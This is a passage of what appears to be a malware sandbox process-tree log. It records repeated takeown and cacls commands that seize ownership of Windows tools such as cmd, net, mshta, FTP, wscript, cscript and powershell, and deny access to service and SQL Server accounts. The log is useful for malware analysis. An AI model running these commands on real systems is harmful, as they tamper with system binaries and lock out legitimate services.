C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1912

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Users:r
3⤵
PID:1768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1800

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
3⤵
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d SERVICE
3⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
3⤵
PID:524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1732

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d "network service"
3⤵
PID:1776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1784

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g system:r
3⤵
PID:1484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:1760

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cmd.exe /a
3⤵
- Modifies file permissions
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
3⤵
PID:1424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:584

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
3⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
3⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1684

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
3⤵
PID:1352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
3⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3⤵
PID:536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1752

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:1636

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1908

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /g Administrators:f
3⤵
PID:1912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Users:r
3⤵
PID:1800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1744

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Administrators:r
3⤵
PID:1848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d SERVICE
3⤵
PID:1356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssqlserver
3⤵
PID:644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1748

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d "network service"
3⤵
PID:524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d system
3⤵
PID:892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2020

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3⤵
PID:1580

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net.exe /a
3⤵
- Modifies file permissions
PID:1728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:580

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3⤵
PID:1452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3⤵
PID:1352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:864

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d system
3⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1752

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3⤵
PID:1636

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net1.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /g Administrators:f
3⤵
PID:1768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Users:r
3⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1744

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d SERVICE
3⤵
PID:1708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3⤵
PID:1072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1724

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d "network service"
3⤵
PID:1508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1712

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d system
3⤵
PID:644

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:660

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net1.exe /a
3⤵
- Modifies file permissions
PID:1732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1680

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3⤵
PID:1984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:892

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3⤵
PID:1868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1208

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3⤵
PID:1940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1812

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
3⤵
PID:1948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d system
3⤵
PID:2044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1592

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
3⤵
PID:1596

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\mshta.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /g Administrators:f
3⤵
PID:696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Users:r
3⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:864

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
3⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d SERVICE
3⤵
PID:1768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1156

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
3⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d "network service"
3⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:636

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d system
3⤵
PID:1708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1356

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:1072

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\mshta.exe /a
3⤵
- Modifies file permissions
PID:1544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1508

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
3⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:644

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
3⤵
PID:524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:964

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
3⤵
PID:1732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1680

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
3⤵
PID:1984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:892

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
3⤵
PID:1868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2020

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
3⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1208

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d system
3⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1452

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:1940

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\FTP.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1972

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /g Administrators:f
3⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1352

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Users:r
3⤵
PID:1592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1604

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
3⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:968

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d SERVICE
3⤵
PID:696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:560

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
3⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d "network service"
3⤵
PID:1908

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d system
3⤵
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1744

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:1708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1792

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\FTP.exe /a
3⤵
- Modifies file permissions
PID:1072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1508

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
3⤵
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:644

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
3⤵
PID:796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1776

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
3⤵
PID:1504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
3⤵
PID:860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:584

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
3⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:436

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d system
3⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:1812

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\wscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /g Administrators:f
3⤵
PID:1592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Users:r
3⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1108

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
3⤵
PID:560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1908

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d SERVICE
3⤵
PID:1792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1156

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
3⤵
PID:1448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d "network service"
3⤵
PID:952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1748

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d system
3⤵
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1732

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:796

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\wscript.exe /a
3⤵
- Modifies file permissions
PID:1984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1980

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
3⤵
PID:944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
3⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:436

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
3⤵
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1120

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
3⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
3⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d system
3⤵
PID:1352

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:1272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1592

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1108

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /g Administrators:f
3⤵
PID:560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1612

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Users:r
3⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1848

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
3⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d SERVICE
3⤵
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
3⤵
PID:1744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:952

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d "network service"
3⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1664

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d system
3⤵
PID:1732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:796

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:1984

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cscript.exe /a
3⤵
- Modifies file permissions
PID:984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
3⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1208

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
3⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1948

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:636

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
3⤵
PID:384

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
3⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1596

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
3⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d system
3⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:864

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:1192

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
